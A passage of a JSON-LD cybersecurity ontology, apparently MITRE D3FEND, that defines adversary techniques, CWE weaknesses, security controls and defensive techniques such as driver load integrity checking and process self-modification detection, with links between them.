      "rdfs:subClassOf": {
        "@id": "d3f:RemoteCommand"
      }
    },
    {
      "@id": "d3f:NIST_SP_800-53_R5_AC-5",
      "@type": [
        "owl:NamedIndividual",
        "d3f:NISTControl"
      ],
      "d3f:broader": [
        {
          "@id": "d3f:LocalFilePermissions"
        },
        {
          "@id": "d3f:UserAccountPermissions"
        }
      ],
      "d3f:control-name": "Separation of Duties",
      "d3f:member-of": {
        "@id": "d3f:NIST_SP_800-53_R5"
      },
      "rdfs:label": "AC-5"
    },
    {
      "@id": "d3f:T0823",
      "@type": "owl:Class",
      "d3f:attack-id": "T0823",
      "d3f:definition": "Adversaries may attempt to gain access to a machine via a Graphical User Interface (GUI) to enhance execution capabilities. Access to a GUI allows a user to interact with a computer in a more visual manner than a CLI. A GUI allows users to move a cursor and click on interface objects, with a mouse and keyboard as the main input devices, as opposed to just using the keyboard.",
      "rdfs:label": "Graphical User Interface - ATTACK ICS",
      "rdfs:subClassOf": {
        "@id": "d3f:ATTACKICSExecutionTechnique"
      },
      "skos:prefLabel": "Graphical User Interface"
    },
    {
      "@id": "d3f:enabled-by",
      "@type": "owl:ObjectProperty",
      "d3f:definition": "x enabled-by y: A top level technique y enables a tactic x, that is, the property indicates that a technique y is used to put a particular tactic x into action. In other words, y renders x capable or able for some task.  Inverse of enables.",
      "owl:inverseOf": {
        "@id": "d3f:enables"
      },
      "rdfs:isDefinedBy": {
        "@id": "http://wordnet-rdf.princeton.edu/id/00513958-v"
      },
      "rdfs:label": "enabled-by",
      "rdfs:subPropertyOf": {
        "@id": "d3f:associated-with"
      }
    },
    {
      "@id": "d3f:OSAPISuspendThread",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "An OS API function that pauses the execution of a thread.",
      "d3f:invokes": {
        "@id": "d3f:SuspendThread"
      },
      "rdfs:label": "OS API Suspend Thread",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:OSAPISystemFunction"
        },
        {
          "@id": "_:Nd3eeaa2e749f4c60be5e3353de039be7"
        }
      ]
    },
    {
      "@id": "_:Nd3eeaa2e749f4c60be5e3353de039be7",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:invokes"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:SuspendThread"
      }
    },
    {
      "@id": "d3f:CWE-585",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-585",
      "d3f:definition": "The product contains an empty synchronized block.",
      "rdfs:label": "Empty Synchronized Block",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-1071"
      }
    },
    {
      "@id": "d3f:DriverLoadIntegrityChecking",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual",
        "d3f:DriverLoadIntegrityChecking"
      ],
      "d3f:authenticates": {
        "@id": "d3f:HardwareDriver"
      },
      "d3f:d3fend-id": "D3-DLIC",
      "d3f:definition": "Ensuring the integrity of drivers loaded during initialization of the operating system.",
      "d3f:kb-article": "## How it works\nThis technique can be accomplished in a number of ways:\n\n* A kernel level security agent installed on a host machine ensures that the driver associated with the agent is first in the initialization order. A dependent DLL associated with the driver is configured to be processed before other dependent DLLs and executes a number of operations to ensure the driver associated with the security agent is initialized first.\n\n* Kernel components can be signed by a certificate obtained by a third party to verify the source of the component and whether it has been modified. When signed, the component will include a signature block implemented as a hash value of the component header and can also include a certificate chain. The signature and certificate data are typically added before the kernel component is distributed to the public.\n\n\n## Considerations\n\n* Private keys used to sign certificates in the name of reputable companies have been stolen in the past, as in cases where certificates from Adobe, Realtek, and JMicron were used to sign malicious executables. (Source: https://resources.infosecinstitute.com/cybercrime-exploits-digital-certificates/#gref)\n\n* Trusted Root Certificate Authorities have been compromised, yielding the ability to use the compromised keys to generate certificates with an arbitrary company name.\n\n* It may not be difficult for an attacker to start an organization which can obtain a signed certificate.\n\n* A root certificate authority (CA) whose certificate is trusted in the verification logic could generate incorrect certificates, if it is lax or has ulterior motives.",
      "d3f:kb-reference": [
        {
          "@id": "d3f:Reference-IntegrityAssuranceThroughEarlyLoadingInTheBootPhase_CrowdstrikeInc"
        },
        {
          "@id": "d3f:Reference-ProtectedComputingEnvironment_MicrosoftTechnologyLicensingLLC"
        }
      ],
      "rdfs:label": "Driver Load Integrity Checking",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:PlatformHardening"
        },
        {
          "@id": "_:N5fa385ce489049c09d7599ff689bab64"
        }
      ]
    },
    {
      "@id": "_:N5fa385ce489049c09d7599ff689bab64",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:authenticates"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:HardwareDriver"
      }
    },
    {
      "@id": "d3f:DS0025",
      "@type": [
        "owl:NamedIndividual",
        "d3f:ATTACKEnterpriseDataSource"
      ],
      "d3f:definition": "Infrastructure, platforms, or software that are hosted on-premise or by third-party providers, made available to users through network connections and/or APIs",
      "rdfs:comment": "This data source currently has no mappings to digital artifacts.",
      "rdfs:label": "Cloud Service (ATT&CK DS)"
    },
    {
      "@id": "d3f:filters",
      "@type": "owl:ObjectProperty",
      "d3f:definition": "x filters y: A technique or agent x removes some specified set of entities from the content of a digital artifact y, by passing the artifact's content through a filter.  A filter is a device that removes something from whatever passes through it.",
      "rdfs:isDefinedBy": {
        "@id": "http://wordnet-rdf.princeton.edu/id/01461293-v"
      },
      "rdfs:label": "filters",
      "rdfs:seeAlso": [
        {
          "@id": "http://wordnet-rdf.princeton.edu/id/03344588-n"
        },
        {
          "@id": "http://www.ontologyrepository.com/CommonCoreOntologies/Filter"
        }
      ],
      "rdfs:subPropertyOf": [
        {
          "@id": "d3f:associated-with"
        },
        {
          "@id": "d3f:isolates"
        }
      ]
    },
    {
      "@id": "d3f:InputDevice",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "In computing, an input device is a piece of equipment used to provide data and control signals to an information processing system such as a computer or information appliance. Examples of input devices include keyboards, mice, scanners, digital cameras, joysticks, and microphones.",
      "rdfs:isDefinedBy": {
        "@id": "dbr:Input_device"
      },
      "rdfs:label": "Input Device",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:HardwareDevice"
        },
        {
          "@id": "d3f:LocalResource"
        }
      ]
    },
    {
      "@id": "d3f:IMP-0006",
      "@type": "owl:Class",
      "d3f:attack-id": "IMP-0006",
      "d3f:definition": "Threat actors may attempt to steal the data that is being gathered, processed, and sent from the victim spacecraft. Many spacecraft have a particular purpose associated with them and the data they gather is deemed mission critical. By attempting to steal this data, the mission, or purpose, of the spacecraft could be lost entirely.",
      "rdfs:label": "Theft - SPARTA",
      "rdfs:seeAlso": {
        "@id": "https://sparta.aerospace.org/technique/IMP-0006/"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:SPARTAImpactTechnique"
      },
      "skos:prefLabel": "Theft"
    },
    {
      "@id": "d3f:release-date",
      "@type": "owl:AnnotationProperty",
      "d3f:definition": "x release-date y: The object x has the release-date y.",
      "rdfs:label": "release-date",
      "rdfs:subPropertyOf": [
        {
          "@id": "d3f:d3fend-annotation"
        },
        {
          "@id": "owl:versionInfo"
        }
      ]
    },
    {
      "@id": "d3f:CWE-393",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-393",
      "d3f:definition": "A function or operation returns an incorrect return value or status code that does not indicate the true result of execution, causing the product to modify its behavior based on the incorrect result.",
      "rdfs:label": "Return of Wrong Status Code",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:CWE-684"
        },
        {
          "@id": "d3f:CWE-703"
        }
      ]
    },
    {
      "@id": "d3f:GraphicalUserInterface",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "A graphical user interface (GUI)  is a type of user interface that allows users to interact with electronic devices through graphical icons and visual indicators such as secondary notation, instead of text-based user interfaces, typed command labels or text navigation. GUIs were introduced in reaction to the perceived steep learning curve of command-line interfaces (CLIs), which require commands to be typed on a computer keyboard.",
      "rdfs:isDefinedBy": {
        "@id": "dbr:Graphical_user_interface"
      },
      "rdfs:label": "Graphical User Interface",
      "rdfs:subClassOf": {
        "@id": "d3f:UserInterface"
      },
      "skos:altLabel": "GUI"
    },
    {
      "@id": "d3f:OSAPIUnloadModule",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "An OS API function that removes a previously loaded module from memory.",
      "d3f:invokes": {
        "@id": "d3f:UnloadModule"
      },
      "rdfs:label": "OS API Unload Module",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:OSAPISystemFunction"
        },
        {
          "@id": "_:N698d2c8986fd40e6ab9c185fe1527a03"
        }
      ]
    },
    {
      "@id": "_:N698d2c8986fd40e6ab9c185fe1527a03",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:invokes"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:UnloadModule"
      }
    },
    {
      "@id": "d3f:CWE-571",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-571",
      "d3f:definition": "The product contains an expression that will always evaluate to true.",
      "rdfs:label": "Expression is Always True",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-710"
      }
    },
    {
      "@id": "d3f:T1022",
      "@type": "owl:Class",
      "d3f:attack-id": "T1022",
      "d3f:definition": "Data is encrypted before being exfiltrated in order to hide the information that is being exfiltrated from detection or to make the exfiltration less conspicuous upon inspection by a defender. The encryption is performed by a utility, programming library, or custom algorithm on the data itself and is considered separate from any encryption performed by the command and control or file transfer protocol. Common file archive formats that can encrypt files are RAR and zip.",
      "owl:deprecated": true,
      "rdfs:comment": "This technique has been revoked by T1560",
      "rdfs:label": "Data Encrypted",
      "rdfs:seeAlso": {
        "@id": "d3f:T1560"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:ExfiltrationTechnique"
      }
    },
    {
      "@id": "d3f:T0852",
      "@type": "owl:Class",
      "d3f:attack-id": "T0852",
      "d3f:definition": "Adversaries may attempt to perform screen capture of devices in the control system environment. Screenshots may be taken of workstations, HMIs, or other devices that display environment-relevant process, device, reporting, alarm, or related data. These device displays may reveal information regarding the ICS process, layout, control, and related schematics. In particular, an HMI can provide a lot of important industrial process information. (Citation: ICS-CERT October 2017) Analysis of screen captures may provide the adversary with an understanding of intended operations and interactions between critical devices.",
      "rdfs:label": "Screen Capture - ATTACK ICS",
      "rdfs:subClassOf": {
        "@id": "d3f:ATTACKICSCollectionTechnique"
      },
      "skos:prefLabel": "Screen Capture"
    },
    {
      "@id": "d3f:EX-0018",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:attack-id": "EX-0018",
      "d3f:definition": "The adversary inflicts physical effects on a satellite without mechanical contact, using energy delivered through the environment. Principal modalities are electromagnetic pulse (EMP), high-power laser (optical/thermal effects), and high-power microwave (HPM). These methods can be tuned for reversible disruption (temporary sensor saturation, processor upsets) or irreversible damage (component burnout, optics degradation), and may be executed from ground, airborne, or space platforms given line-of-sight and power/aperture conditions. Forensics are often ambiguous: signatures may resemble environmental phenomena or normal degradations, and confirmation of effect is frequently limited to what the operator observes in telemetry or performance loss.",
      "d3f:impairs": {
        "@id": "d3f:OTEmbeddedComputer"
      },
      "rdfs:label": "Non-Kinetic Physical Attack - SPARTA",
      "rdfs:seeAlso": {
        "@id": "https://sparta.aerospace.org/technique/EX-0018/"
      },
      "rdfs:subClassOf": [
        {
          "@id": "d3f:SPARTAExecutionTechnique"
        },
        {
          "@id": "_:N968e2dff3f444dca8d6407c1596f9beb"
        }
      ],
      "skos:prefLabel": "Non-Kinetic Physical Attack"
    },
    {
      "@id": "_:N968e2dff3f444dca8d6407c1596f9beb",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:impairs"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:OTEmbeddedComputer"
      }
    },
    {
      "@id": "d3f:PrimaryStorage",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:contains": [
        {
          "@id": "d3f:PageFrame"
        },
        {
          "@id": "d3f:ProcessSegment"
        }
      ],
      "d3f:definition": "Primary memory of a computer is memory that is wired directly to the processor, consisting of RAM and possibly ROM.  These terms are used in contrast to mass storage devices and cache memory (although we may note that when a program accesses main memory, it is often actually interacting with a cache).",
      "rdfs:isDefinedBy": {
        "@id": "https://www.memorymanagement.org/glossary/m.html#term-main-memory"
      },
      "rdfs:label": "Primary Storage",
      "rdfs:seeAlso": {
        "@id": "https://en.wikipedia.org/wiki/Computer_data_storage#Primary_storage"
      },
      "rdfs:subClassOf": [
        {
          "@id": "d3f:HardwareDevice"
        },
        {
          "@id": "d3f:Storage"
        },
        {
          "@id": "_:Nf8c2bf644913407a8c8f1c13449daf62"
        },
        {
          "@id": "_:N9202829c16944c52a7e51119dd42af98"
        }
      ]
    },
    {
      "@id": "_:Nf8c2bf644913407a8c8f1c13449daf62",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:contains"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:PageFrame"
      }
    },
    {
      "@id": "_:N9202829c16944c52a7e51119dd42af98",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:contains"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:ProcessSegment"
      }
    },
    {
      "@id": "d3f:NetworkMapping",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual",
        "d3f:NetworkMapping"
      ],
      "d3f:d3fend-id": "D3-NM",
      "d3f:definition": "Network mapping encompasses the techniques to identify and model the physical layer, network layer, and data exchange layers of the organization's network and their physical location, and determine allowed pathways through that network.",
      "d3f:display-order": 3,
      "d3f:enables": {
        "@id": "d3f:Model"
      },
      "rdfs:label": "Network Mapping",
      "rdfs:seeAlso": {
        "@id": "https://en.wikipedia.org/wiki/Network_topology"
      },
      "rdfs:subClassOf": [
        {
          "@id": "d3f:DefensiveTechnique"
        },
        {
          "@id": "_:N747a17d1db0648de97927ba8fdf72cf0"
        }
      ]
    },
    {
      "@id": "_:N747a17d1db0648de97927ba8fdf72cf0",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:enables"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:Model"
      }
    },
    {
      "@id": "d3f:InternetDNSLookup",
      "@type": "owl:Class",
      "d3f:definition": "An internet Domain Name System (DNS) lookup is a DNS lookup made from a host on a network that is resolved after querying a DNS name server hosted on a different network.",
      "rdfs:label": "Internet DNS Lookup",
      "rdfs:seeAlso": {
        "@id": "dbr:Internetworking"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:DNSLookup"
      }
    },
    {
      "@id": "d3f:CWE-402",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-402",
      "d3f:definition": "The product makes resources available to untrusted parties when those resources are only intended to be accessed by the product.",
      "d3f:synonym": "Resource Leak",
      "rdfs:label": "Transmission of Private Resources into a New Sphere ('Resource Leak')",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-668"
      }
    },
    {
      "@id": "d3f:Reference-CatiaUAFPlugin",
      "@type": [
        "owl:NamedIndividual",
        "d3f:InternetArticleReference"
      ],
      "d3f:has-link": {
        "@type": "xsd:anyURI",
        "@value": "https://www.3ds.com/products-services/catia/products/no-magic/addons/uaf-plugin/"
      },
      "d3f:kb-abstract": "MagicDraw offers the most robust standards compliant [Unified Architecture Framework (UAF)], DoDAF 2.0, MODAF 1.2, NAF 3, and NAF 4 via a UAF standardized solution. And what's more, No Magic fully supports all architectural framework products ensuring you achieve project results. No Magic also leads the industry in usability and interoperability, ensuring that you avoid unnecessary cost, schedule and performance risk.",
      "d3f:kb-organization": "Dassault Systemes",
      "d3f:kb-reference-of": [
        {
          "@id": "d3f:DataExchangeMapping"
        },
        {
          "@id": "d3f:OperationalActivityMapping"
        },
        {
          "@id": "d3f:OperationalDependencyMapping"
        },
        {
          "@id": "d3f:OrganizationMapping"
        },
        {
          "@id": "d3f:ServiceDependencyMapping"
        },
        {
          "@id": "d3f:SystemDependencyMapping"
        }
      ],
      "d3f:kb-reference-title": "Catia UAF Plugin",
      "rdfs:label": "Reference - Catia UAF Plugin"
    },
    {
      "@id": "d3f:SystemStartupDirectory",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "A system startup directory is a directory containing executable files or links to executable files which are run when the system starts.",
      "rdfs:label": "System Startup Directory",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:Directory"
        },
        {
          "@id": "d3f:SystemConfigurationInitResource"
        },
        {
          "@id": "d3f:SystemInitConfiguration"
        }
      ]
    },
    {
      "@id": "d3f:OTWriteCommandEvent",
      "@type": "owl:Class",
      "d3f:definition": "Write or store data.",
      "rdfs:label": "OT Write Command Event",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:OTProcessDataCommandEvent"
        },
        {
          "@id": "_:N9343574004464a9287a4fb3015cf5634"
        }
      ]
    },
    {
      "@id": "_:N9343574004464a9287a4fb3015cf5634",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:has-participant"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:OTWriteCommand"
      }
    },
    {
      "@id": "d3f:AML.T0047",
      "@type": "owl:Class",
      "d3f:attack-id": "AML.T0047",
      "d3f:definition": "Adversaries may use a product or service that uses artificial intelligence under the hood to gain access to the underlying AI model.\nThis type of indirect model access may reveal details of the AI model or its inferences in logs or metadata.",
      "rdfs:label": "AI-Enabled Product or Service - ATLAS",
      "rdfs:seeAlso": {
        "@id": "https://atlas.mitre.org/techniques/AML.T0047"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:ATLASAIModelAccessTechnique"
      },
      "skos:prefLabel": "AI-Enabled Product or Service"
    },
    {
      "@id": "d3f:REC-0005",
      "@type": "owl:Class",
      "d3f:attack-id": "REC-0005",
      "d3f:definition": "Adversaries seek to passively (and sometimes semi-passively) capture mission communications across terrestrial networks and RF/optical links to reconstruct protocols, extract telemetry, and derive operational rhythms. On networks, packet captures, logs, and flow data from ground stations, mission control, and cloud backends can expose service boundaries, authentication patterns, and automation. In the RF domain, wideband recordings, spectrograms, and demodulation of TT&C and payload links, spanning VHF/UHF through S/L/X/Ka and, increasingly, optical, enable identification of modulation/coding, framing, and beacon structures. Even when links are encrypted, metadata such as carrier plans, symbol rates, polarization, and cadence can support traffic analysis, timing attacks, or selective interference. Community capture networks and open repositories amplify the reach of a modest adversary.",
      "rdfs:label": "Eavesdropping - SPARTA",
      "rdfs:seeAlso": {
        "@id": "https://sparta.aerospace.org/technique/REC-0005/"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:SPARTAReconnaissanceTechnique"
      },
      "skos:prefLabel": "Eavesdropping"
    },
    {
      "@id": "d3f:Reference-AdvancedDeviceMatchingSystem",
      "@type": [
        "owl:NamedIndividual",
        "d3f:PatentReference"
      ],
      "d3f:has-link": {
        "@type": "xsd:anyURI",
        "@value": "https://patents.google.com/patent/US10892951B2/"
      },
      "d3f:kb-abstract": "Disclosed is a device management system for discovery and management of components added to computer systems and sub-systems. The device management system provides for recognizing a newly added component, and determining if the newly added component is already a part of the system inventory. The newly added component is matched with a component currently on the system, based on at least one matching attribute. A point total is calculated for each match level and a final match score is provided. The match score is compared with an aggressiveness level to determine if a match does indeed exist.",
      "d3f:kb-author": "Rajneesh Jalan, Joseph M. Schmitt, and Marco Simoes",
      "d3f:kb-organization": "Device42 Inc",
      "d3f:kb-reference-of": {
        "@id": "d3f:HardwareComponentInventory"
      },
      "d3f:kb-reference-title": "Advanced device matching system",
      "rdfs:label": "Reference - Advanced device matching system"
    },
    {
      "@id": "d3f:Reference-TPM2.0LibrarySpecification_TrustedComputingGroup,Incorporated",
      "@type": [
        "owl:NamedIndividual",
        "d3f:SpecificationReference"
      ],
      "d3f:has-link": {
        "@type": "xsd:anyURI",
        "@value": "https://trustedcomputinggroup.org/resource/tpm-library-specification/"
      },
      "d3f:kb-abstract": "This specification defines the Trusted Platform Module (TPM), a device that enables trust in computing platforms in general. It is broken into parts to make the role of each part clear. All parts are required in order to constitute a complete standard. For a complete definition of all requirements necessary to build a TPM, the designer will need to use the appropriate platform-specific specification to understand all of the requirements for a TPM in a specific application or make appropriate choices as an implementer. Those wishing to create a TPM need to be aware that this specification does not provide a complete picture of the options and commands necessary to implement a TPM. To implement a TPM the designer needs to refer to the relevant platform-specific specification to understand the options and settings required for a TPM in a specific type of platform or make appropriate choices as an implementer.",
      "d3f:kb-author": "Trusted Computing Group",
      "d3f:kb-mitre-analysis": "",
      "d3f:kb-organization": "Trusted Computing Group, Incorporated",
      "d3f:kb-reference-of": {
        "@id": "d3f:TPMBootIntegrity"
      },
      "d3f:kb-reference-title": "TPM 2.0 Library Specification",
      "rdfs:label": "Reference - TPM 2.0 Library Specification - Trusted Computing Group, Incorporated"
    },
    {
      "@id": "d3f:AssetInventoryAgent",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "An asset inventory agent is a software tool which captures and transmits information about the devices on a network, including their hostnames, MAC addresses, software they may be running, etc.",
      "rdfs:label": "Asset Inventory Agent",
      "rdfs:seeAlso": {
        "@id": "https://www.ninjaone.com/blog/how-to-do-an-it-asset-inventory"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:NetworkAgent"
      }
    },
    {
      "@id": "d3f:PersistenceTechnique",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "The adversary is trying to maintain their foothold.",
      "d3f:enables": {
        "@id": "d3f:TA0003"
      },
      "rdfs:label": "Persistence Technique",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:ATTACKEnterpriseTechnique"
        },
        {
          "@id": "d3f:OffensiveTechnique"
        },
        {
          "@id": "_:N6aeff012790146499e96fb12ca3d1598"
        }
      ]
    },
    {
      "@id": "_:N6aeff012790146499e96fb12ca3d1598",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:enables"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:TA0003"
      }
    },
    {
      "@id": "d3f:CCI-002178_v2022-04-05",
      "@type": [
        "owl:NamedIndividual",
        "d3f:CCIControl"
      ],
      "d3f:contributor": {
        "@id": "d3f:DISA_FSO"
      },
      "d3f:definition": "The information system enforces the revocation of access authorizations resulting from changes to the security attributes of subjects based on organization-defined rules governing the timing of revocations of access authorizations.",
      "d3f:member-of": {
        "@id": "d3f:CCICatalog_v2022-04-05"
      },
      "d3f:narrower": {
        "@id": "d3f:SystemCallFiltering"
      },
      "d3f:published": {
        "@type": "xsd:dateTime",
        "@value": "2013-06-24T00:00:00"
      },
      "rdfs:label": "CCI-002178"
    },
    {
      "@id": "d3f:Resource",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "In computing, a system resource, or simply resource, is any physical or virtual component of limited availability within a computer system. Every device connected to a computer system is a resource. Every internal system component is a resource. Virtual system resources include files (concretely file handles), network connections (concretely network sockets), and memory areas. Managing resources is referred to as resource management, and includes both preventing resource leaks (releasing a resource when a process has finished using it) and dealing with resource contention (when multiple processes wish to access a limited resource).",
      "rdfs:isDefinedBy": {
        "@id": "dbr:System_resource"
      },
      "rdfs:label": "Resource",
      "rdfs:subClassOf": {
        "@id": "d3f:DigitalInformationBearer"
      }
    },
    {
      "@id": "d3f:DeepConvolutionalGAN",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:d3fend-id": "D3A-DCG",
      "d3f:definition": "Deep Convolutional GAN (DCGAN) uses convolutional and convolutional-transpose layers in the generator and discriminator, respectively.",
      "d3f:kb-article": "## References\nAnalytics Vidhya. (2021). Deep Convolutional Generative Adversarial Network (DCGAN) for Beginners. [Link](https://www.analyticsvidhya.com/blog/2021/07/deep-convolutional-generative-adversarial-network-dcgan-for-beginners/)",
      "d3f:synonym": "DCGAN",
      "rdfs:label": "Deep Convolutional GAN",
      "rdfs:subClassOf": {
        "@id": "d3f:ImageSynthesisGAN"
      }
    },
    {
      "@id": "d3f:BayesianModelCombination",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:d3fend-id": "D3A-BMC",
      "d3f:definition": "Bayesian model combination (BMC) is an algorithmic correction to Bayesian model averaging (BMA). Instead of sampling each model in the ensemble individually, it samples from the space of possible ensembles (with model weights drawn randomly from a Dirichlet distribution having uniform parameters)",
      "d3f:kb-article": "## References\nEnsemble learning. Wikipedia.  [Link](https://en.wikipedia.org/wiki/Ensemble_learning).\n\nShultz, K. M., & Peterson, L. E. (2011). Model-averaged confidence intervals for ensemble learning. In *International Joint Conference on Neural Networks* (pp. 2677-2684).  [Link](https://axon.cs.byu.edu/papers/Kristine.ijcnn2011.pdf).",
      "rdfs:label": "Bayesian Model Combination",
      "rdfs:subClassOf": {
        "@id": "d3f:EnsembleLearning"
      }
    },
    {
      "@id": "d3f:NetworkDeviceEvent",
      "@type": "owl:Class",
      "d3f:definition": "An event capturing the activity or state of network devices, such as Ethernet adapters, Wi-Fi modules, or virtual interfaces. These events highlight connectivity, configuration, or performance changes.",
      "rdfs:label": "Network Device Event",
      "rdfs:subClassOf": {
        "@id": "d3f:HardwareDeviceEvent"
      }
    },
    {
      "@id": "d3f:WindowsNtCreateMailslotFile",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "Creates a special File Object called Mailslot.",
      "rdfs:label": "Windows NtCreateMailslotFile",
      "rdfs:seeAlso": {
        "@id": "https://j00ru.vexillium.org/syscalls/nt/64/"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:OSAPICreateFile"
      }
    },
    {
      "@id": "d3f:T1433",
      "@type": "owl:Class",
      "d3f:attack-id": "T1433",
      "d3f:definition": "On Android, an adversary could call standard operating system APIs from a malicious application to gather call log data, or with escalated privileges could directly access files containing call log data.",
      "owl:deprecated": true,
      "rdfs:comment": "This technique has been revoked by T1636.002",
      "rdfs:label": "Access Call Log - ATTACK Mobile",
      "rdfs:seeAlso": {
        "@id": "d3f:T1636.002"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:ATTACKMobileCollectionTechnique"
      },
      "skos:prefLabel": "Access Call Log"
    },
    {
      "@id": "d3f:SystemApplicationCycleCount",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "A system variable that tracks the number of times the controller has completed its main program loop (scan cycle) since startup or last reset.",
      "d3f:synonym": "Controller Cycle Count",
      "rdfs:comment": "In most controllers this is not a default tag; rather, it is something that should be programmed.",
      "rdfs:label": "System Application Cycle Count",
      "rdfs:subClassOf": {
        "@id": "d3f:SystemPlatformVariable"
      }
    },
    {
      "@id": "d3f:CWE-626",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-626",
      "d3f:definition": "The product does not properly handle null bytes or NUL characters when passing data between different representations or components.",
      "rdfs:label": "Null Byte Interaction Error (Poison Null Byte)",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:CWE-147"
        },
        {
          "@id": "d3f:CWE-436"
        }
      ]
    },
    {
      "@id": "d3f:T1410",
      "@type": "owl:Class",
      "d3f:attack-id": "T1410",
      "d3f:definition": "An adversary may capture network traffic to and from the device to obtain credentials or other sensitive data, or redirect network traffic to flow through an adversary-controlled gateway to do the same.",
      "owl:deprecated": true,
      "rdfs:comment": "This technique has been revoked by T1638",
      "rdfs:label": "Network Traffic Capture or Redirection - ATTACK Mobile",
      "rdfs:seeAlso": {
        "@id": "d3f:T1638"
      },
      "rdfs:subClassOf": [
        {
          "@id": "d3f:ATTACKMobileCollectionTechnique"
        },
        {
          "@id": "d3f:ATTACKMobileCredentialAccessTechnique"
        }
      ],
      "skos:prefLabel": "Network Traffic Capture or Redirection"
    },
    {
      "@id": "d3f:ProcessSelf-ModificationDetection",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual",
        "d3f:ProcessSelf-ModificationDetection"
      ],
      "d3f:analyzes": {
        "@id": "d3f:Process"
      },
      "d3f:d3fend-id": "D3-PSMD",
      "d3f:definition": "Detects processes that modify, change, or replace their own code at runtime.",
      "d3f:kb-article": "## How it Works\nA security agent installed on the host machine intercepts API calls between a process and the operating system. Intercepted API calls are then compared against attack signatures/patterns to identify API calls that modify executable memory or modify the entry point address of a suspended child process. Attack patterns include:\n\n* Executable code of a suspended child process removed from memory by one or more API calls.\n* New executable code injected and / or loaded into memory of a suspended child process by one or more API calls.\n* Executable code modified by one or more API calls.\n* Next instruction pointer value in memory modified by one or more API calls.\n\n## Considerations\nComparing loaded code segments of processes with what is expected to have been loaded from a file can result in false positives, due to legitimate uses of self-modification for decrypting or uncompressing code segments.",
      "d3f:kb-reference": {
        "@id": "d3f:Reference-SystemAndMethodForProcessHollowingDetection_CarbonBlackInc"
      },
      "rdfs:label": "Process Self-Modification Detection",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:ProcessAnalysis"
        },
        {
          "@id": "_:N3661f0e6c2bf4ad3ba5759710eb54e65"
        }
      ]
    },
    {
      "@id": "_:N3661f0e6c2bf4ad3ba5759710eb54e65",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:analyzes"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:Process"
      }
    },
    {
      "@id": "d3f:LinuxExecve",
      "@type": "owl:Class",
      "d3f:definition": "Executes a program by replacing the calling process with a new program, with newly initialized stack, heap, and (initialized and uninitialized) data segments. The PID stays the same.",
      "rdfs:isDefinedBy": {
        "@id": "https://man7.org/linux/man-pages/man2/execve.2.html"
      },
      "rdfs:label": "Linux Execve",
      "rdfs:subClassOf": {
        "@id": "d3f:OSAPIExec"
      }
    },
    {
      "@id": "d3f:OTChangeDataCommandEvent",
      "@type": "owl:Class",
      "d3f:definition": "OT command that modifies existing data on a remote device.",
